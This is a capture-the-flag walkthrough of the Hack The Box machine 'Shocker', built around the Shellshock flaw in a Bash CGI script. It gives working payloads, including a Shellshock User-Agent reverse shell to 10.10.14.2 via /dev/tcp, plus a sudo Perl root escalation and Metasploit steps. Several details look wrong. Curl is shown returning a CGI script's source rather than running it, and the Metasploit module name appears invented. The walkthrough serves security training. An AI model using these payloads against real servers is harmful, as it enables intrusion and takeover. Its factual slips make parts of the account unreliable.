HTB Shocker Walkthrough — Shellshock and CGI Exploitation

Introduction

Shocker is a 2019 retired Hack The Box machine that exploits one of the most infamous vulnerabilities in computing history: Shellshock (CVE-2014-6271). Discovered in September 2014, Shellshock is a family of vulnerabilities in the Bash shell that allows remote attackers to execute arbitrary commands via crafted environment variables.

What makes Shocker interesting is that Shellshock was a global panic — it affected millions of systems worldwide, from web servers to embedded devices to routers. The name "Shocker" is a direct reference to the vulnerability's impact. The box itself is a straightforward, clean exploitation path that teaches you exactly how Shellshock works and how to exploit it through CGI scripts.

"Shellshock was the moment the internet realized that a bug in a 25-year-old Unix utility could bring down the entire web."

Machine Info

• Name: Shocker
• OS: Linux (Ubuntu)
• Difficulty: Easy
• Release: 2019
• Retired: 2019
• Target IP: 10.10.10.56

Step 1: Enumeration

Let's see what's exposed:

nmap -sC -sV -oN shocker.nmap 10.10.10.56

PORT     STATE    SERVICE     VERSION
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2

Only two ports: HTTP on 80 and SSH on 2222 (non-standard port).

Web Directory Busting

Let's examine the web server:

curl -I http://10.10.10.56

HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)

Standard Apache landing page. Let's fuzz for directories:

gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x cgi,sh,pl

/cgi-bin/             (Status: 403)
/icons/               (Status: 403)
/server-status        (Status: 403)

cgi-bin/ returns 403 Forbidden, which means the directory exists but we can't list it. Let's fuzz for specific scripts inside cgi-bin

gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x cgi,sh,pl

/user.sh              (Status: 200)

Found /cgi-bin/user.sh. This is the entry point.

Step 2: Understanding Shellshock

Shellshock exploits how Bash processes environment variables. When a CGI script is executed, the web server passes HTTP headers as environment variables (like HTTP_USER_AGENT, HTTP_HOST, etc.). Shellshock allows defining functions in environment variables that persist after the function definition ends:

# Normal function definition in an environment variable:
env x='() { :;}; echo vulnerable' bash -c "echo test"

If the system is vulnerable, the echo vulnerable part executes immediately when Bash starts, before the function is even called. This means any CGI script that calls Bash (even indirectly) is exploitable.

Testing the CGI Script

curl -v http://10.10.10.56/cgi-bin/user.sh

#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "Hello World"

The script is a simple Bash CGI that outputs "Hello World". Because it starts with #!/bin/bash, we can exploit Shellshock through it.

Step 3: Exploitation

Shellshock Payload

To test for the vulnerability:

curl -H "User-Agent: () { :;}; echo; echo; echo vulnerable" \
  http://10.10.10.56/cgi-bin/user.sh

vulnerable
Hello World

The echo vulnerable appeared before "Hello World". Confirmed — the server is vulnerable.

Getting a Reverse Shell

Now for the actual exploit. Set up a listener:

nc -lvnp 443

Send the payload:

curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'" \
  http://10.10.10.56/cgi-bin/user.sh

Check your listener:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

whoami
www-data

We're in as www-data.

Step 4: Privilege Escalation

We have a foothold as www-data. Let's enumerate for privilege escalation:

sudo -l

Matching Defaults entries for www-data on shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl

The user www-data can run /usr/bin/perl as root without a password. This is a classic privesc — Perl has shell execution capabilities:

sudo /usr/bin/perl -e 'exec "/bin/sh"'

And we're root:

id
uid=0(root) gid=0(root)

whoami
root

hostname
Shocker

Capturing Flags

cat /home/shelly/user.txt
73a5165c9a60842915c0d5a3cdd6f773

cat /root/root.txt
9df2322fcf13d9254bb2766bab257731

Alternative Exploit Paths

Metasploit

msf6 > use exploit/multi/http/apache_mod_cgi_backdoor_user_agent
msf6 > set RHOSTS 10.10.10.56
msf6 > set TARGETURI /cgi-bin/user.sh
msf6 > set LHOST 10.10.14.2
msf6 > run

Shellshock Scanner

git clone https://github.com/nccgroup/shocker
./shocker 10.10.10.56

Step 5: Remediation

Shellshock was patched in Bash 4.3 patches 25-27. The fix was to stop processing function definitions after the function body ends — any trailing code is now ignored:

# Patched Bash:
env x='() { :;}; echo vulnerable' bash -c "echo test"
# Output: bash: warning: x: ignoring function definition attempt
# Output: test

On a real system, the fix is simply:

sudo apt update && sudo apt upgrade bash

Lessons Learned

Shocker drills in two critical concepts:

1. CGI + Bash is a dangerous combination — anytime a web server executes CGI scripts written in Bash (or any shell), Shellshock is a possibility. Always check for CGI endpoints during enumeration.
2. ~sudo -l~ is your first privesc command — before looking at SUID binaries, kernel exploits, or cron jobs, check what the current user can run as root. It's often the quickest path.

"The path from /cgi-bin/user.sh to root is two commands on Shocker. But you have to find it first, and that's where enumeration earns its keep."

This was one of the first boxes that taught me that the most impactful vulnerabilities aren't always complex — Shellshock was a single line of code that broke the internet. Sometimes the simplest bug has the widest blast radius.

Up next: TryHackMe's Kenobi — Samba exploitation with a twist involving path hijacking.